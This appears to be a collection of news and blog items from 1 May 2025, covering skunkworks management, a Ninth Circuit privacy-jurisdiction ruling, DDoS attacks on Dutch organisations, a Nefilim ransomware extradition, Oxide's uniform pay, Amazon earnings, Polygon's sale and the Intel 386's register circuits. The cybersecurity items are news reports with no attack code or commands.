It makes sense to exit skunkworks mode once execution risk begins to dominate design risk. However, there’s a second consideration: ideally, the team stays in skunkworks mode until it achieves some kind of actual success, i.e., something ships. To understand why, consider that a key reason to create a skunkworks project is to incubate a new type of culture within an incumbent org. Over time, we can create more conventional-looking ancillary teams around the core project, creating a composite of the new culture and the incumbent one. But timing is critical; if we expand before anything ships, the incumbent culture will drown out the new one (which makes sense, since the new culture has no success to back it).
M. Fail-fast vs. Zombie mode:
New, risky projects often have to operate in uncertain environments where our assumptions (about the market, hardware, customers) are shifting rapidly. It’s better to move quickly and try something rather than aim for perfect decision making; and to stop quickly rather than allow the project to meander, consume resources / attention, and incur opportunity cost. If we can fail fast and recover quickly, bad decisions don’t matter as much; and we get data for the next attempt. Failing fast on any endeavor requires us to establish concrete criteria for determining its success in some short time-frame (e.g., 3-6 months) before starting work. Fail-fast works for entire projects, but also for smaller decisions within the project (e.g., personnel assignments) or even as a philosophy for building the system (in effect, we can always convert throughput into goodput via rapid iteration on failures).
N. We want R&D, not !R&!D:
R&D projects can often end up in no-man’s land, partly because it’s difficult to hold these projects accountable and measure their success. Ideally we want the project to be good “R” (publishable in top conferences) and good “D” (shipping to production). An anti-pattern is if external researchers think the project must be “D” (since it’s obviously not good “R”) and external developers think the project must be “R” (since it’s obviously not good “D”).
O. Synchronous, frequent, informal communication is critical:
Prioritizing daily synchronous communication is critical. Note that this meeting is not for listing and managing work items (nobody wants a stressful daily stand-up in a skunkworks project); its goal is to build a shared understanding of the design space; and a shared set of values for assessing points in that space. We want to encourage free-wheeling debate on designs, long-term strategy, and short-term tactics; and train engineers to collaboratively think and talk about design. To manage meeting load, eliminate all other broadcast meetings. This principle is one of the reasons we prefer small teams.
P. People are not fungible.
Team composition is critical. Our operating model is a sports team where we pick individuals for particular positions based on the needs of the team and their skill-sets. A second goalkeeper doesn’t help a soccer team much, even if they are absolutely stellar at what they do. Good managers will often do their best to make engineers fungible, in order to reduce personnel risk to the project; but in a true skunkworks team, nobody is fungible.
Q. Run towards risk.
In skunkworks mode, the goal is to reduce technical risk as quickly as possible. Accordingly, the team has to surge on areas where risk is high. Fight the temptation to make steady progress on well-understood, low-risk parts of the system.
R. Keep the team small.
This one seems obvious but is notoriously difficult to enforce in large companies, for a number of reasons. A well-meaning manager might add engineers to a project to 1) make it go faster; and 2) reward the engineer. But we’ve known for 50 years (!) that software projects actually do not go faster if you add people to them[2]. And adding the wrong type of engineer can often hurt the project and the engineer’s career (see rule P about goalkeepers). Critically, keeping the team small ensures that it’s always resource-constrained (see rule K about ruthless prioritization); and also protects the project against cost-cutting initiatives (since the company doesn’t significantly reduce cost by shutting the project down).
I hope these rules help managers and engineers find common ground – good luck starting your own clean-slate skunkworks projects!
Footnotes:
Ninth Circuit Hands Users A Big Win: Californians Can Sue Out-of-State Corporations That Violate State Privacy Laws
Electronic Frontier Foundation
www.eff.org
2025-05-01 21:06:17
Simple common sense tells us that a corporation’s decision to operate in every state shouldn’t mean it can’t be sued in most of them. Sadly, U.S. law doesn’t always follow common sense. That’s why we were so pleased with a recent holding from the Ninth Circuit Court of Appeals. Setting a crucial precedent, the court held that consumers can sue national or multinational companies in the consumers’ home courts if those companies violate state data privacy laws.
The case, Briskin v. Shopify, stems from a California resident’s allegations that Shopify, a company that offers back-end support to e-commerce companies around the U.S. and the globe, installed tracking software on his devices without his knowledge or consent, and used it to secretly collect data about him. Shopify also allegedly tracked users’ browsing activities across multiple sites and compiled that information into comprehensive user profiles, complete with financial “risk scores” that companies could use to block users’ future purchases. The Ninth Circuit initially dismissed the lawsuit for lack of personal jurisdiction, ruling that Shopify did not have a close enough connection to California to be fairly sued there. Collecting data on Californians along with millions of other users was not enough; to be sued in California, Shopify had to do something to target Californians in particular.
Represented by nonprofit Public Citizen, Briskin asked the court to rehear the case en banc (meaning, review by the full court rather than just a three-judge panel). The court agreed and invited further briefing. After that review, the court vacated the earlier holding, agreeing with the plaintiff (and EFF’s argument in a supporting amicus brief) that Shopify’s extensive collection of information from users in other states should not prevent California plaintiffs from having their day in court in their home state.
The key issue was whether Shopify’s actions were “expressly aimed” at California. Shopify argued that it was “mere happenstance” that its conduct affected a consumer in California, arising from the consumer’s own choices. The Ninth Circuit rejected that theory, noting:
Pre-internet, there would be no doubt that the California courts would have specific personal jurisdiction over a third party who physically entered a Californian’s home by deceptive means to take personal information from the Californian’s files for its own commercial gain. Here, though Shopify’s entry into the state of California is by electronic means, its surreptitious interception of Briskin’s personal identifying information certainly is a relevant contact with the forum state.
The court further noted that the harm in California was not “mere happenstance” because, among other things, Shopify allegedly knew plaintiff's location either prior to or shortly after installing its initial tracking software on his device as well as those of other Californians.
Importantly, the court overruled earlier cases that had suggested that “express aiming” required the plaintiff to show that a company “targeted” California in particular. As the court recognized, such a requirement would have the “perverse effect of allowing a corporation to direct its activities toward all 50 states yet to escape specific personal jurisdiction in each of those states for claims arising from or relating to the relevant contacts in the forum state that injure that state’s residents.”
Instead, the question is whether Shopify’s own conduct connected it to California in a meaningful way. The answer was a resounding yes, for multiple reasons:
Shopify knows about its California consumer base, conducts its regular business in California, contacts California residents, interacts with them as an intermediary for its merchants, installs its software onto their devices in California, and continues to track their activities.
In other words, a company can’t deliberately collect a bunch of information about a person in a given state, including where they are located, use that information for its own commercial purposes, and then claim it has little or no relationship with that state.
As states around the country seek to fill the gaps left by Congress’ failure to pass comprehensive data privacy legislation, this ruling helps ensure that those state laws will have real teeth. In an era of ever-increasing corporate surveillance, that’s a crucial win.
Pro-Russia hacktivists bombard Dutch public orgs with DDoS attacks
Bleeping Computer
www.bleepingcomputer.com
2025-05-01 21:04:26
Russia-aligned hacktivists persistently target key public and private organizations in the Netherlands with distributed denial of service (DDoS) attacks, causing access problems and service disruptions.
The situation was acknowledged via a statement by the country's National Cyber Security Center (NCSC), part of the Dutch Ministry of Justice.
"This week, several Dutch organizations have been targeted by large-scale DDoS attacks,"
reads the NCSC announcement
.
"The DDoS attacks are directed at both Dutch and other European organizations. Within the Netherlands, both public and private entities are being attacked."
The NCSC noted that the attacks were claimed by the hacktivist group named NoName057(16) on the threat actor's Telegram channel.
Although the NCSC said the threat actor's motive is unclear, NoName057(16) declared it was retribution for the Netherlands sending €6 billion in military aid to Ukraine and planning to allocate another €3.5 billion in 2026.
The threat group's latest message on Telegram from yesterday indicates that the attacks continue.
According to local media outlets, the DDoS attacks have impacted the provinces of Groningen, Noord-Holland, Zeeland, Drenthe, Overijssel, Noord-Brabant, and the municipalities of Apeldoorn, Breda, Nijmegen, and Tilburg.
The online portals of these public organizations were reportedly unreachable for several hours this week, though according to officials, there has been no compromise of internal systems or data.
NoName057(16) is a threat actor that, since March 2022, has had significant involvement in numerous DDoS attacks targeting European and American organizations.
The threat group even launched a crowdsourced DDoS platform called 'DDoSIA' where "volunteers" would get paid to lend their firepower in attacks. The platform became very successful, recruiting thousands of users in under a year and launching multiple disruptive attacks on Western entities.
In July 2024, the Spanish authorities arrested three members of DDoSIA and seized their devices for further investigation. However, there was no significant follow-up to the operation, the group's leaders have not been named or indicted, and the DDoS attacks continue.
Four years ago, we were struggling to hire. Our team was small (~23 employees), and we knew that we needed many more people to execute on our audacious vision. While we had had success hiring in our personal networks, those networks now felt tapped; we needed to get further afield. As is our wont, we got together as a team and brainstormed: how could we get a bigger and broader applicant pool? One of our engineers, Sean, shared some personal experience: that Oxide’s principles and values were very personally important to him — but that when he explained them to people unfamiliar with the company, they were (understandably?) dismissed as corporate claptrap. Sean had found, however, that there was one surefire way to cut through the skepticism: to explain our approach to compensation. Maybe, Sean wondered, we should talk about it publicly?
"I could certainly write a blog entry explaining it," I offered. At this
suggestion, the team practically lunged with enthusiasm: the reaction was so
uniformly positive that I have to assume that everyone was sick of explaining
this most idiosyncratic aspect of Oxide to friends and family. So what was
the big deal about our compensation? Well, as I wrote in the resulting piece, Compensation as a Reflection of Values, our compensation is not merely transparent, but
uniform. The piece — unsurprisingly, given the evergreen hot topic that is
compensation — got a ton of attention. While some of that attention was
negative (despite the piece trying to frontrun every HN hater!), much of it was
positive — and everyone seemed to be at least intrigued.
And in terms of its initial purpose, the piece succeeded beyond our wildest
imagination: it brought a surge of new folks interested in the company. Best
of all, the people new to Oxide were interested for all of the right reasons:
not the compensation per se, but for the values that the compensation
represents. The deeper they dug, the more they found to like — and many who
learned about Oxide for the first time through that blog entry we now count as
long-time, cherished colleagues.
That blog entry was a long time ago now, and today we have ~75 employees
(and a shipping product!); how is our compensation model working out for us?
Before we get into our deeper findings, two updates that are so important that
we have updated the blog entry itself. First, the dollar figure itself
continues to increase over time (as of this writing in 2025, $207,264);
things definitely haven’t gotten (and aren’t
getting!) any cheaper. And second, we did introduce variable compensation for some sales roles. Yes, those roles can make more than the rest of us — but
they can also make less, too. And, importantly: if/when those folks are
making more than the rest of us, it’s because they’re selling a lot — a
result that can be celebrated by everyone!
Those critical updates out of the way, how is it working? There have been a
lot of surprises along the way, mostly (all?) of the positive variety. A
couple of things that we have learned:
People take their own performance really seriously.
When some outsiders
hear about our compensation model, they insist that it can’t possibly work
because "everyone will slack off." I have come to find this concern to be more
revealing of the person making the objection than of our model, as our
experience has been in fact the opposite: in my one-on-one conversations with
team members, a frequent subject of conversation is people who are concerned
that they aren’t doing enough (or that they aren’t doing the right thing, or
that their work is progressing slower than they would like). I find my job is
often to help quiet this inner critic while at the same time stoking what I
feel is a healthy urge: when one holds one’s colleagues in high regard, there
is an especially strong desire to help contribute — to prove oneself worthy
of a superlative team. Our model allows people to focus on their own
contribution (whatever it might be).
People take hiring really seriously.
When evaluating a peer (rather
than a subordinate), one naturally has high expectations — and because (in
the sense of our wages, anyway) everyone at Oxide is a peer, it shouldn’t be
surprising that folks have very high expectations for potential future
colleagues. And because the Oxide hiring process is writing
intensive, it allows for candidates to be thoroughly reviewed by Oxide
employees — who are tough graders! It is, bluntly, really hard to get
a job at Oxide.
It allows us to internalize the importance of different roles.
One of the
more incredible (and disturbingly frequent) objections I have heard is: "But
is that what you’ll pay support folks?" I continue to find this question
offensive, but I no longer find it surprising: the specific dismissal of
support roles reveals a widespread and corrosive devaluation of those closest
to customers. My rejoinder is simple: think of the best support engineers
you’ve worked with; what were they worth? Anyone who has shipped complex
systems knows these extraordinary people — calm under fire, deeply technical,
brilliantly resourceful, profoundly empathetic — are invaluable to the
business. So what if you built a team entirely of folks like that? The
response has usually been: well, sure, if you’re going to only hire those folks. Yeah, we are — and we have!
It allows for fearless versatility.
A bit of a corollary to the
above, but subtly different: even though we (certainly!) hire and select for
certain roles, our uniform compensation means we can in fact think primarily
in terms of people unconfined by those roles. That is, we can be very fluid
about what we’re working on, without fear of how it will affect a perceived
career trajectory. As a concrete example: we had a large customer that wanted
to put in place a program for some of the additional work they wanted to see
in the product. The complexity of their needs required dedicated program
management resources that we couldn’t spare, and in another more static
company we would have perhaps looked to hire. But in our case, two folks came
together — CJ from operations, and Izzy from support — and did something
together that was in some regards new to both of them (and was neither of
their putative full-time jobs!). The result was indisputably successful: the
customer loved the results, and two terrific people got a chance to work
closely together without worrying about who was dotted-lined to whom.
It has allowed us to organizationally scale.
Many organizations describe
themselves as flat, and a reasonable rebuttal to this is the "shadow hierarchies" created by the tyranny of structurelessness. And indeed, if one were to read (say)
Valve’s (in)famous handbook, the autonomy seems great — but the stack ranking
decidedly less so, especially because the handbook is conspicuously silent on
the subject of compensation. (Unsurprisingly, compensation was weaponized at Valve, which descended into toxic cliquishness.) While we believe that autonomy is important to do one’s best
work, we also have a clear structure at Oxide in that Steve Tuck (Oxide
co-founder and CEO) is
in charge. He has to be: he is held accountable to our investors — and he
must have the latitude to make decisions. Under Steve, it is true that
we don’t have layers of middle management. Might we need some in the
future? Perhaps, but what fraction of middle management in a company is
dedicated to — at some level — determining who gets what in terms of
compensation? What happens when you eliminate that burden completely?
It frees us to both lead and follow.
We expect that
every Oxide employee has the capacity to lead others — and we tap this
capacity frequently. Of course, a company in which everyone is trying to
direct all traffic all the time would be a madhouse, so we also very much rely
on following one another too! Just as our compensation model allows us to
internalize the values of different roles, it allows us to appreciate the
value of both leading and following, and empowers us each with the judgement
to know when to do which. This isn’t always easy or free of ambiguity, but
this particular dimension of our versatility has been essential — and
our compensation model serves to encourage it.
It causes us to hire carefully and deliberately.
Of course, one should always hire carefully and deliberately, but this often isn’t the case — and
many a startup has been ruined by reckless expansion of headcount. One of the
roots of this can be found in a dirty open secret of Silicon Valley middle
management: its ranks are taught to grade their career by the number of
reports in their organization. Just as if you were to compensate software
engineers based on the number of lines of code they wrote, this results in
perverse incentives and predictable disasters — and any Silicon Valley vet
will have plenty of horror stories of middle management jockeying for reqs or
reorgs when they should have been focusing on product and customers. When
you can eliminate middle management, you eliminate this incentive. We grow
the team not because of someone’s animal urges to have the largest possible
organization, but rather because we are at a point where adding people will
allow us to better serve our market and customers.
It liberates feedback from compensation.
Feedback is, of course, very
important: we all want to know when and where we’re doing the right thing!
And of course, we want to know too where there is opportunity for improvement.
However, Silicon Valley has historically tied feedback so tightly to
compensation that it has ceased to even pretend to be constructive: if it
needs to be said, performance review processes aren’t, in fact, about
improving the performance of the team, but rather quantifying and
stack-ranking that performance for purposes of compensation. When
compensation is moved aside, there is a kind of liberation for feedback
itself: because feedback is now entirely earnest, it can be expressed and
received thoughtfully.
It allows people to focus on doing the right thing.
In a world of
traditional, compensation-tied performance review, the organizational priority
is around those things that affect compensation — even at the expense of
activity that clearly benefits the company. This leads to all sorts of wild
phenomena, and most technology workers will be able to tell stories of doing
things that were clearly right for the company, but having to hide it from
management that thought only narrowly in terms of their own stated KPIs and
MBOs. By contrast, over and over (and over!) again, we have found that people
do the right thing at Oxide — even if (especially if?) no one is looking.
The beneficiary of that right thing? More often than not, it’s our customers,
who have uniformly praised the team for going above and beyond.
It allows us to focus on the work that matters.
Relatedly, when
compensation is non-uniform, the process to figure out (and maintain) that
non-uniformity is laborious. All of that work — of line workers assembling
packets explaining themselves, of managers arming themselves with those
packets to fight in the arena of organizational combat, and then of those same
packets ultimately being regurgitated back onto something called a review — is work. Assuming such a process is executed perfectly (something which I
suppose is possible in the abstract, even though I personally have never seen
it), this is work that does not in fact advance the mission of the company.
Not having variable compensation gives us all of that time and energy back to
do the actual work — the stuff that matters.
It has stoked an extraordinary sense of teamwork.
For me personally — and
as I relayed on an episode of Software Misadventures — the highlights of my career have been being a
part of an extraordinary team. The currency of a team is mutual trust, and
while uniform compensation certainly isn’t the only way to achieve that trust,
boy does it ever help! As Steve and I have told one another more times than
we can count: we are so lucky to work on this team, with its extraordinary
depth and breadth.
While our findings have been very positive, I would still reiterate what we
said four years ago: we don’t know what the future holds, and it’s easier to
make an unwavering commitment to the transparency rather than the uniformity.
That said, the uniformity has had so many positive ramifications that the model
feels more important than ever. We are beyond the point of this being a
curiosity; it’s been essential for building a mission-focused team taking on
a problem larger than ourselves. So it’s not a fit for everyone — but if
you are seeking an extraordinary team solving hard problems in service to
customers, consider Oxide!
Amazon to report earnings as investors weigh effects of Trump’s tariffs
Guardian
www.theguardian.com
2025-05-01 20:44:52
Tech giant exceeded expectations for past two quarters, but expected to report slowest revenue growth rate since 2022 Amazon will report its first-quarter earnings for the 2025 fiscal year on Thursday after the New York stock exchange closes – results that will be seen in the context of consumer res...
Amazon reported strong first-quarter earnings for the 2025 fiscal year on Thursday after the New York stock exchange closed – results that will be seen in the context of consumer resilience in the face of Donald Trump’s tariff wars.
Amazon reported $1.59 in earnings-per-share (EPS) and revenue of $155.67bn. Analysts had estimated that the company’s EPS would come in at $1.36 on revenue of $155bn. In particular focus: Amazon’s advertising business, which grew 19% in the first quarter of 2025, handily exceeding analyst expectations as well. The company has exceeded Wall Street’s expectations for the previous two quarters. At the close of the first quarter last year, the company reported earnings of $0.98 per share on sales of $143bn. In spite of the growth, shares dropped in after-hours trading.
Amazon’s earnings report comes as its stock price has dropped 17% this year over fears that consumers will cut back on purchases in response to the US president’s tariffs. A large number of products on Amazon ship from China, which faces a tariff of a whopping 145% imposed by Trump. The company was expected to report its slowest rate of revenue growth for any period since 2022. Poor consumer sentiment numbers alongside gross domestic product figures reported this week showed the US economy contracting at a 0.3% annualized pace in the first quarter.
Amazon’s earnings are a backdrop for how the “magnificent seven” tech giants are learning how to deal with the Trump administration and its ongoing trade war with China and other countries.
Meta and Microsoft reported strong earnings on Wednesday despite the uncertainty brought on by the tariffs, though their businesses are somewhat more insulated from duties imposed on imports than Amazon.
Analysts at UBS said in a note to clients that at least 50% of items sold on Amazon are subject to Trump’s tariffs and could become more expensive as a result.
“Consumers therefore might have to make more difficult choices on where to allocate their dollars,” UBS analysts said.
Earlier this month, Amazon’s CEO, Andy Jassy, told CNBC that Amazon has not seen a drop-off in consumer demand and the company is “going to try and do everything we can” to keep prices low for customers. But he acknowledged some third-party sellers will “need to pass that cost” of tariffs on to consumers.
Earlier this week, the company found itself in the White House crosshairs after a report said that the online retail giant was planning to itemize tariff-related price increases. White House press secretary Karoline Leavitt called the move a “hostile and political act”.
Amazon denied the reports in a statement, saying the plan was “never approved” and displaying tariff costs is “not going to happen”.
Trump reportedly put in a call to Amazon founder Jeff Bezos on Tuesday morning. “Jeff Bezos was very nice. He was terrific,” he later told reporters. “He solved the problem very quickly. Good guy.”
But Massachusetts senator Elizabeth Warren criticized the tense exchange, asking in a letter if Bezos received any “promises or favors” from Trump in exchange for his “subservience” and said it raised concerns “about the potential for tariff-related corruption”.
Ukrainian extradited to US for Nefilim ransomware attacks
Bleeping Computer
www.bleepingcomputer.com
2025-05-01 20:44:03
A Ukrainian national has been extradited from Spain to the United States to face charges over allegedly conducting Nefilim ransomware attacks against companies. [...]...
A Ukrainian national has been extradited from Spain to the United States to face charges over allegedly conducting Nefilim ransomware attacks against companies.
The suspect, Artem Aleksandrovych Stryzhak, 35, was arrested in Spain in June 2024 and extradited to the U.S. on April 30, 2025.
According to the U.S. Department of Justice, Stryzhak allegedly participated in ransomware attacks that targeted high-revenue companies, primarily in the United States, Norway, France, Switzerland, Germany, and the Netherlands.
In June 2021, Stryzhak allegedly became an affiliate of the Nefilim ransomware operation in exchange for 20% of any ransom payments he generated from attacks.
Stryzhak and his co-conspirators researched potential targets using online platforms to gather information about a company's revenue, size, and contact details. One of the more popular sites used by ransomware gangs to research targets is ZoomInfo.
"In one exchange with Stryzhak in or about July 2021, a Nefilim administrator encouraged him to target companies in these countries with more than $200 million in annual revenue," reads the DOJ's
press release
.
When conducting attacks, Nefilim affiliates breach corporate networks, steal data, and then encrypt devices using the ransomware encryptor. The attackers then demand a ransom payment in bitcoin to receive the decryption key and for stolen data not to be leaked. If a victim refuses to pay, the attackers publish the stolen data online on data leak sites.
The Nefilim ransomware launched in 2020, sharing much of its code with the Nemty ransomware. The ransomware encrypted files using AES-128 encryption and appended the ".NEFILIM" file extension to encrypted files.
Ransom notes named "NEFILIM-DECRYPT.txt" were created throughout the device's file system, warning that stolen data would be leaked within seven days if negotiations were not started.
Nefilim ransom note (Source: BleepingComputer)
Nefilim is believed to have later rebranded under other names, including Fusion, Milihpen, Gangbang, Nemty, and Karma.
Stryzhak is charged with conspiracy to commit fraud and related activity, including extortion, in connection with computers. The indictment was unsealed in federal court in Brooklyn, where Stryzhak is scheduled for arraignment before U.S. Magistrate Judge Robert M. Levy.
If convicted, Stryzhak faces up to five years in prison.
Polygon Acquired by Porn Mogul Who Co-Founded Brazzers
404 Media
www.404media.co
2025-05-01 20:35:53
Before he founded Valnet, Hassan Youssef started one of the biggest porn sites on the internet....
Polygon, Vox Media’s video games website, has been acquired by Valnet, a company founded and helmed by Hassan Youssef, a former pornography mogul and the co-founder of the popular adult entertainment site Brazzers.
The news, which broke first on social media via various Polygon writers and editors saying that they suddenly don’t have a job, came as a shock to both Polygon staff and readers. Media in general has been suffering from regular layoffs for years, and video game publications have been hit especially hard recently, with legendary magazine Game Informer shutting down in 2024 (and recently being revived) and layoffs at GameSpot and other publications. But Polygon, a brand that Vox built from scratch and that has a large staff, excellent reporters, a sizable YouTube presence, and relatively less clownish leadership than new media counterpart VICE, did not seem like it was about to be sold and lay off much of its staff.
Valnet owns several entertainment sites including Screen Rant and Collider, as well as a number of video game sites like TheGamer, DualShockers, and Game Rant. In March, The Wrap published a story accusing Valnet of exploitative working conditions; Valnet filed a lawsuit against The Wrap over the article, which it claimed was inaccurate and defamatory.
As the lore has it, Youssef’s story began in 2003 as part of a foosball enthusiasts group including his brother Sam and fellow Concordia University students Matt Keezer and Stephane Manos. They saw an opportunity to make a lot of money in internet porn and started Jugg World, Ass Listing, KeezMovies and XXX Rated Chicks. Eventually, they turned Jugg World into an affiliate network, and opened Brazzers as a pay site.
Some might attribute the popularity of giant boobs in porn to these guys’ single-minded search for cheap and easy profit; former MindGeek CEO Feras Antoon told New York Magazine they focused on breasts “because the big-tits niche was so cheap,” and then “they saw, wow, that tit niche is huge. Then they realized that the MILF niche—the older-woman niche—is even bigger. And they became the masters of the big-tit–MILF niche.”
Sam and Hassan went on to cofound Valnet. Hassan serves as its current CEO while Sam is a board member and also the founder and CEO of Valsoft, an enterprise software company.
“This moment marks a powerful reaffirmation of our deep commitment to gaming, a space we’ve passionately invested in for years,” Youssef, Valnet’s founder and CEO, said in a press release on Thursday. “The addition of Polygon not only strengthens our editorial muscle but also amplifies our ability to deliver unmatched value to both audiences and advertisers. At Valnet, we’re not just participants in this space; we are its undisputed leader, and today, that leadership has never felt stronger.”
Whatever value Youssef sees in Polygon apparently doesn’t include many of the people who made the site what it is.
About the author
Sam Cole is writing from the far reaches of the internet, about sexuality, the adult industry, online culture, and AI. She's the author of How Sex Changed the Internet and the Internet Changed Sex.
About the author
Emanuel Maiberg is interested in little known communities and processes that shape technology, troublemakers, and petty beefs. Email him at emanuel@404media.co
The absurdly complicated circuitry for the 386 processor's registers
The groundbreaking Intel 386 processor (1985) was the first 32-bit processor in the x86 architecture.
Like most processors, the 386 contains numerous registers; registers are a key part of a processor because
they provide storage that is much faster than main memory.
The register set of the 386 includes general-purpose registers, index registers, and segment selectors, as well
as registers with special functions for memory management and operating system implementation.
In this blog post, I look at the silicon die of the 386 and explain how the processor implements its main registers.
It turns out that the circuitry that implements the 386's registers is much more complicated than one would expect.
For the 30 registers that I examine, instead of using a standard circuit, the 386 uses six different circuits,
each one optimized for the particular characteristics of the register.
For some registers, Intel squeezes register cells together to double the storage capacity.
Other registers support accesses of 8, 16, or 32 bits at a time.
Much of the register file is "triple-ported", allowing two registers to be read simultaneously while a value is written
to a third register.
Finally, I was surprised to find that registers don't store bits in order: the lower 16 bits of each register are interleaved, while the upper 16 bits are stored linearly.
The photo below shows the 386's shiny fingernail-sized silicon die under a special metallurgical microscope.
I've labeled the main functional blocks.
For this post, the Data Unit in the lower left quadrant of the chip is the relevant component.
It consists of the 32-bit arithmetic logic unit (ALU) along
with the processor's main register bank (highlighted in red at the bottom).
The circuitry, called the datapath, can be viewed as the heart of the processor.
This die photo of the 386 shows the location of the registers. Click this image (or any other) for a larger version.
The datapath is built with a regular structure: each register or ALU functional unit is a horizontal stripe of circuitry,
forming the horizontal bands visible in the image.
For the most part, this circuitry consists of a carefully optimized circuit copied 32 times, once for each bit of the processor.
Each circuit for one bit is exactly the same width—60 µm—so the functional blocks can be stacked together like microscopic
LEGO bricks.
To link these circuits,
metal bus lines run vertically through the datapath in groups of 32, allowing data to flow up and down through the blocks.
Meanwhile, control lines run horizontally, enabling ALU operations or register reads and writes; the irregular circuitry
on the right side of the Data Unit produces the signals for these control lines, activating the appropriate control
lines for each instruction.
The datapath is highly structured to maximize performance while minimizing its area on the die.
Below, I'll look at how the registers are implemented according to this structure.
A processor's registers are one of the most visible features of the processor architecture.
The 386 processor contains 16 registers for use by application programmers, a small number by modern standards,
but large enough for the time.
The diagram below shows the eight 32-bit general-purpose registers.
At the top are four registers called EAX, EBX, ECX, and EDX.
Although these registers are 32-bit registers, they can also be treated as 16 or 8-bit registers for backward
compatibility with earlier processors.
For instance, the lower half of EAX can be accessed as the 16-bit register AX, while the bottom byte of EAX can
be accessed as the 8-bit register AL.
Moreover, bits 15-8 can also be accessed as an 8-bit register called AH.
In other words, there are four different ways to access the EAX register, and similarly for the other three registers.
As will be seen, these features complicate the implementation of the register set.
The bottom half of the diagram shows that the 32-bit EBP, ESI, EDI, and ESP registers can also be treated as 16-bit registers BP, SI, DI, and SP. Unlike the previous registers,
these ones cannot be treated as 8-bit registers.
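To make the aliasing concrete, here is a small C sketch of the programmer's view (my illustration, assuming a little-endian host to match x86 and C11 anonymous structs; it is not code from the article):

#include <stdint.h>
#include <stdio.h>

/* Illustrative model of the EAX/AX/AH/AL overlay: AL is the low
   byte, AH the next byte, and AX the low 16 bits of EAX. */
typedef union {
    uint32_t eax;
    uint16_t ax;        /* bits 15-0 */
    struct {
        uint8_t al;     /* bits 7-0  */
        uint8_t ah;     /* bits 15-8 */
    };
} Reg32;

int main(void) {
    Reg32 r = { .eax = 0x12345678 };
    printf("EAX=%08X AX=%04X AH=%02X AL=%02X\n",
           (unsigned)r.eax, r.ax, r.ah, r.al);  /* 12345678 5678 56 78 */
    r.ah = 0xAB;                   /* partial write: only bits 15-8 change */
    printf("EAX=%08X\n", (unsigned)r.eax);      /* 1234AB78 */
    return 0;
}

Supporting exactly this kind of partial access in hardware, rather than in software, is what complicates the register circuitry described below.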
The 386 also has six segment registers that define the
start of memory segments; these are 16-bit registers.
The 16 application registers are rounded out by the status flags and instruction pointer (EIP);
they are viewed as 32-bit registers, but their implementation is more complicated.
The 386 also has numerous registers for operating system programming, but I won't discuss them here, since they
are likely in other parts of the chip.[1]
Finally, the 386 has numerous temporary registers that are not visible to the programmer but are used by the microcode
to perform complex instructions.
The 6T and 8T static RAM cells
The 386's registers are implemented with static RAM cells, a circuit that can hold one bit.
These cells are arranged into a grid to provide multiple registers.
Static RAM can be contrasted with the dynamic RAM that computers use for their main memory:
dynamic RAM holds each bit in a tiny capacitor, while static RAM uses a faster but larger and more complicated circuit.
Since main memory holds gigabytes of data, it uses dynamic RAM to provide dense and inexpensive storage.
But the tradeoffs are different for registers: the storage capacity is small, but speed is of the essence.
Thus, registers use the static RAM circuit that I'll explain below.
The concept behind a static RAM cell is to connect two inverters into a loop.
If an inverter has a "0" as input, it will output a "1", and vice versa.
Thus, the inverter loop will be stable,
with one inverter on and one inverter off, and each inverter supporting the other.
Depending on which inverter is on, the circuit stores a 0 or a 1, as shown below.
Thus, the pair of inverters provides one bit of memory.
Two inverters in a loop can store a 0 or a 1.
To be useful, however, the inverter loop needs a way to store a bit into it, as well as a way to read out the stored bit.
To write a new value into the circuit, two signals are fed in, forcing the inverters to the desired new values.
One inverter receives the new bit value, while the other inverter receives the complemented bit value.
This may seem like a brute-force way to update the bit, but it works.
The trick is that the inverters in the cell are small and weak, while the input signals are higher current,
able to overpower the inverters.[2]
These signals are fed in through wiring called "bitlines"; the bitlines can also be used to read the value
stored in the cell.
By adding two pass transistors to the circuit, the cell can be read and written.
To control access to the register,
the bitlines are connected to the inverters through pass transistors, which act as switches to
control access to the inverter loop.[3]
When the pass transistors are on, the
signals on the write lines can pass through to the inverters. But when the pass transistors are off, the
inverters are isolated from the write lines.
The pass transistors are turned on by a control signal, called a "wordline" since it controls access to a word
of storage in the register.
Since each inverter is constructed from two transistors, the circuit above consists of six transistors—thus this circuit is called a "6T" cell.
The 6T cell uses the same bitlines for reading and writing, so you can't read and write to registers simultaneously.
But adding two transistors creates an "8T" circuit that lets you read from one register
and write to another register at the same time. (In technical terms, the register file is two-ported.)
In the 8T schematic below, the two additional transistors (G and H) are used for reading.
Transistor G buffers the cell's value; it turns on if the inverter output is high, pulling the read output bitline low.[4]
Transistor H is a pass transistor that blocks this signal until a read is performed on this register;
it is controlled by a read wordline.
Note that there are two bitlines for writing (as before) along with one bitline for reading.
Schematic of a storage cell. Each transistor is labeled with a letter.
To construct registers (or memory), a grid is constructed from these cells.
Each row corresponds to a register, while each column corresponds to a bit position.
The horizontal lines are the wordlines, selecting which word to access, while the
vertical lines are the bitlines, passing bits in or out of the registers.
For a write, the vertical bitlines provide the 32 bits (along with their complements).
For a read, the vertical bitlines receive the 32 bits from the register.
A wordline is activated to read or write the selected register.
To summarize: each row is a register, data flows vertically, and control signals flow horizontally.
Static memory cells (8T) organized into a grid.
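As a software analogy for this organization (my sketch of the behavior, not Intel's circuit), a two-ported register file built from 8T cells lets one row be read while a different row is written in the same cycle:

#include <stdint.h>
#include <stdio.h>

#define NUM_REGS 8

/* Toy model of a two-ported (8T-style) register file. Each row is
   a register; the 32 bits of a row travel together on the bitlines. */
typedef struct {
    uint32_t rows[NUM_REGS];
} RegFile;

/* One access cycle: assert one read wordline and one write wordline. */
uint32_t cycle(RegFile *rf, int read_row, int write_row, uint32_t write_val) {
    uint32_t read_val = rf->rows[read_row];  /* value driven onto the read bitline */
    rf->rows[write_row] = write_val;         /* value forced in on the write bitlines */
    return read_val;
}

int main(void) {
    RegFile rf = {{0}};
    rf.rows[3] = 0xDEADBEEF;
    /* Read register 3 while writing register 5 in the same cycle. */
    uint32_t v = cycle(&rf, 3, 5, 0x12345678);
    printf("read %08X, reg 5 now %08X\n", (unsigned)v, (unsigned)rf.rows[5]);
    return 0;
}

The triple-ported cells described below extend this idea with a second read port, so two rows can be read while a third is written.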
Six register circuits in the 386
The die photo below zooms in on the register circuitry in the lower left corner of the 386 processor.
You can see the arrangement of storage cells into a grid, but note that the pattern changes from row to row.
This circuitry implements 30 registers: 22 of the registers hold 32 bits, while the bottom ones are 16-bit registers.
By studying the die, I determined that there are six different register circuits,
which I've arbitrarily labeled (a) to (f).
In this section, I'll describe these six types of registers.
The 386's main register bank, at the bottom of the datapath. The numbers show how many bits of the register can be accessed.
I'll start at the bottom with the simplest circuit: eight 16-bit registers that I'm calling type (f).
